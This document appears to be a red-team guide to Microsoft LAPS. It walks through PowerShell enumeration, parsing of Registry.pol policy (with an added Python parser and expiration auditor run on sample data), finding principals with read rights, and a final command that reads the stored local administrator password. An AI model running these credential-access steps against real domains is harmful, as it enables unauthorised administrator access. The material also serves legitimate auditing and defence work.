# LAPS

## Introduction

Local Administrator Password Solution (LAPS) is a Microsoft tool that helps organizations secure their local administrator accounts on Windows-based computers. It provides a unique, randomly generated password for each local administrator account on every managed computer in an organization's network, and stores the password securely in Active Directory.

## Enumeration

There are three main ways to check whether LAPS is enabled on the machine you have access to (the first check looks at the local host; the other two query the domain).

* Check if the `AdmPwd.dll` exists on the system.

```powershell
# The LAPS client-side extension (AdmPwd.dll) is installed here; quote the path because of the spaces
dir "C:\Program Files\LAPS\CSE"
```

* Check for GPOs related to "LAPS".

```powershell
Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
```

* Check if the object `ms-Mcs-AdmPwdExpirationTime` is not null.

```powershell
Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName
```
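The third check only tests whether `ms-Mcs-AdmPwdExpirationTime` is populated. The attribute is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC), so the value also tells you whether the client-side extension is actually rotating the password: an expiration date well in the past means the computer object was once managed but rotation has stopped. The script below is an added example, not part of the original guide; it assumes the records were exported with the two attribute names shown and that a short grace period after expiry is normal, since the CSE rotates on the next Group Policy refresh.

```python
"""Audit ms-Mcs-AdmPwdExpirationTime values exported from Active Directory.

Added example for this page, not part of the original guide. Assumes the
attribute holds a Windows FILETIME and that computers without a value are
not managed by LAPS at all.
"""
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-ns ticks from 1 January 1601 (UTC)
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Convert a FILETIME integer to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, using integer arithmetic to avoid float loss."""
    td = dt - FILETIME_EPOCH
    return (td.days * 86400 + td.seconds) * 10_000_000 + td.microseconds * 10


def classify(expiration, now: datetime, grace_days: int = 1) -> str:
    """Label one computer: unmanaged (no value), stale (expired past grace) or managed."""
    if expiration is None or expiration == "":
        return "unmanaged"
    exp = filetime_to_datetime(int(expiration))
    if exp + timedelta(days=grace_days) < now:
        return "stale"          # password should have rotated but did not
    return "managed"


def audit(records, now: datetime):
    """Group exported computer records by LAPS state.

    records: iterable of dicts with "dnsHostName" and "ms-Mcs-AdmPwdExpirationTime"
    (the attribute may be missing, None, an int or a numeric string).
    """
    result = {"managed": [], "stale": [], "unmanaged": []}
    for rec in records:
        state = classify(rec.get("ms-Mcs-AdmPwdExpirationTime"), now)
        result[state].append(rec["dnsHostName"])
    return result


# Constructed sample export (hostnames and times are made up for this example)
NOW = datetime(2024, 6, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_RECORDS = [
    {"dnsHostName": "ws01.example.local",
     "ms-Mcs-AdmPwdExpirationTime": datetime_to_filetime(NOW + timedelta(days=10))},
    {"dnsHostName": "srv02.example.local",
     "ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW - timedelta(days=40)))},
    {"dnsHostName": "ws03.example.local",
     "ms-Mcs-AdmPwdExpirationTime": datetime_to_filetime(NOW - timedelta(hours=6))},
    {"dnsHostName": "dc01.example.local"},
]

if __name__ == "__main__":
    for state, hosts in audit(SAMPLE_RECORDS, NOW).items():
        print(f"{state:>10}: {', '.join(hosts) or '-'}")
```

A computer that shows up as `stale` deserves the same attention as one that is unmanaged: its local administrator password is older than policy allows, and if expiration protection is disabled (as in the policy parsed later on this page) a writer on the object could have pushed the expiration date out deliberately.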

## Exploitation

1\. Download the `Registry.pol` file, which is located under the `GPCFileSysPath` obtained while enumerating GPOs.

```powershell
ls <GPCFileSysPath>\Machine\Registry.pol
```

2\. Parse the file with the `Parse-PolFile` cmdlet from the [GPRegistryPolicyParser](https://github.com/PowerShell/GPRegistryPolicyParser) module.

```powershell
Parse-PolFile .\Desktop\Registry.pol
```

After parsing the file, you can obtain the following information:

* Password complexity: upper-case letters, lower-case letters and numbers.
* Password length: 14 characters.
* Passwords are changed every 30 days.
* The LAPS-managed account name is `LapsAdmin`.
* Password expiration protection is disabled.
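To make clear what `Parse-PolFile` is actually reading, here is a small parser for the `Registry.pol` format written for this page (it is an added example, not the guide's own code and not GPRegistryPolicyParser). The file starts with the ASCII magic `PReg` and a little-endian version DWORD, followed by entries of the form `[key;value;type;size;data]` where the brackets and semicolons are UTF-16LE characters, `key` and `value` are NUL-terminated UTF-16LE strings, `type` and `size` are raw DWORDs and `data` is `size` bytes. The LAPS registry key and value names used in the summary (`Software\Policies\Microsoft Services\AdmPwd`, `PasswordComplexity`, and so on) are those from the LAPS ADMX template and are an assumption here; the sample policy is constructed to match the settings listed above.

```python
"""Registry.pol (PReg) parser that summarizes LAPS policy settings.

Added example for this page; not part of the original guide or of
GPRegistryPolicyParser. LAPS key/value names are assumed to follow the
LAPS ADMX template.
"""
import struct

PREG_MAGIC = b"PReg"
PREG_VERSION = 1
REG_SZ = 1
REG_DWORD = 4
OPEN, SEP, CLOSE = "[".encode("utf-16-le"), ";".encode("utf-16-le"), "]".encode("utf-16-le")
NUL = b"\x00\x00"

# LAPS policy location and value names (assumption: matches the LAPS ADMX)
LAPS_KEY = "Software\\Policies\\Microsoft Services\\AdmPwd"
COMPLEXITY = {1: "upper", 2: "upper+lower", 3: "upper+lower+numbers",
              4: "upper+lower+numbers+specials"}


def build_pol(entries):
    """Serialize (key, value, type, data) tuples into a Registry.pol blob (sample data only)."""
    out = bytearray(PREG_MAGIC + struct.pack("<I", PREG_VERSION))
    for key, value, rtype, data in entries:
        if rtype == REG_DWORD:
            payload = struct.pack("<I", data)
        elif rtype == REG_SZ:
            payload = data.encode("utf-16-le") + NUL      # size includes the terminator
        else:
            payload = bytes(data)
        out += (OPEN + key.encode("utf-16-le") + NUL + SEP
                + value.encode("utf-16-le") + NUL + SEP
                + struct.pack("<I", rtype) + SEP
                + struct.pack("<I", len(payload)) + SEP
                + payload + CLOSE)
    return bytes(out)


def parse_pol(blob: bytes):
    """Return a list of (key, value, type, data) tuples from a Registry.pol blob."""
    if blob[:4] != PREG_MAGIC:
        raise ValueError("not a PReg file")
    version = struct.unpack_from("<I", blob, 4)[0]
    if version != PREG_VERSION:
        raise ValueError("unsupported PReg version %d" % version)

    def read_cstr(pos):
        # NUL-terminated UTF-16LE string; advance two bytes at a time so a
        # code unit such as 0x0100 is never mistaken for the terminator
        end = pos
        while blob[end:end + 2] != NUL:
            if end + 2 > len(blob):
                raise ValueError("unterminated string at offset %d" % pos)
            end += 2
        return blob[pos:end].decode("utf-16-le"), end + 2

    def expect(pos, token):
        if blob[pos:pos + 2] != token:
            raise ValueError("malformed entry at offset %d" % pos)
        return pos + 2

    entries, pos = [], 8
    while pos < len(blob):
        pos = expect(pos, OPEN)
        key, pos = read_cstr(pos)
        pos = expect(pos, SEP)
        value, pos = read_cstr(pos)
        pos = expect(pos, SEP)
        rtype = struct.unpack_from("<I", blob, pos)[0]
        pos = expect(pos + 4, SEP)
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = expect(pos + 4, SEP)
        raw = blob[pos:pos + size]
        pos = expect(pos + size, CLOSE)
        if rtype == REG_DWORD and size == 4:
            data = struct.unpack("<I", raw)[0]
        elif rtype == REG_SZ:
            data = raw.decode("utf-16-le").rstrip("\x00")
        else:
            data = raw                       # other types left as raw bytes
        entries.append((key, value, rtype, data))
    return entries


def summarize_laps(entries):
    """Extract the LAPS settings into a readable dict, or None if the key is absent."""
    vals = {v: d for k, v, _, d in entries if k.lower() == LAPS_KEY.lower()}
    if not vals:
        return None
    return {
        "enabled": vals.get("AdmPwdEnabled") == 1,
        "complexity": COMPLEXITY.get(vals.get("PasswordComplexity"), "unknown"),
        "length": vals.get("PasswordLength"),
        "age_days": vals.get("PasswordAgeDays"),
        "account": vals.get("AdminAccountName", "built-in Administrator"),
        "expiration_protection": vals.get("PwdExpirationProtectionEnabled") == 1,
    }


# Constructed sample policy with the settings the guide lists above
SAMPLE_POL = build_pol([
    (LAPS_KEY, "AdmPwdEnabled", REG_DWORD, 1),
    (LAPS_KEY, "PasswordComplexity", REG_DWORD, 3),
    (LAPS_KEY, "PasswordLength", REG_DWORD, 14),
    (LAPS_KEY, "PasswordAgeDays", REG_DWORD, 30),
    (LAPS_KEY, "AdminAccountName", REG_SZ, "LapsAdmin"),
    (LAPS_KEY, "PwdExpirationProtectionEnabled", REG_DWORD, 0),
])

if __name__ == "__main__":
    for name, setting in summarize_laps(parse_pol(SAMPLE_POL)).items():
        print(f"{name:>22}: {setting}")
```

Run against a real `Registry.pol` by replacing `SAMPLE_POL` with the file's bytes. From a defender's side, the two values worth acting on are `PwdExpirationProtectionEnabled` (when 0, anyone with write access to a computer object can push the expiration date out indefinitely) and `PasswordComplexity` below 4, which weakens the generated password.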

3\. Then, find out who can read the LAPS password. There are two alternatives.

* Directly looking at the computer objects' ACLs.

```powershell
# List the SIDs of principals granted read access to ms-Mcs-AdmPwd on each computer object
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier
# Resolve a SID to its account or group name
ConvertFrom-SID <SecurityIdentifier>
```

* Using the [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit).

> :information_source: `Find-LAPSDelegatedGroups` will query each OU and find domain groups that have delegated read access. `Find-AdmPwdExtendedRights` goes a little deeper and queries each individual computer for users that have "All Extended Rights". This will reveal any users that can read the attribute without having had it specifically delegated to them.

```powershell
. .\LAPSToolkit.ps1
Find-LAPSDelegatedGroups
```

4\. Once you have a principal with permission to read the password, read it as follows.

```powershell
Get-DomainComputer -Identity <HOSTNAME> -Properties ms-Mcs-AdmPwd
```


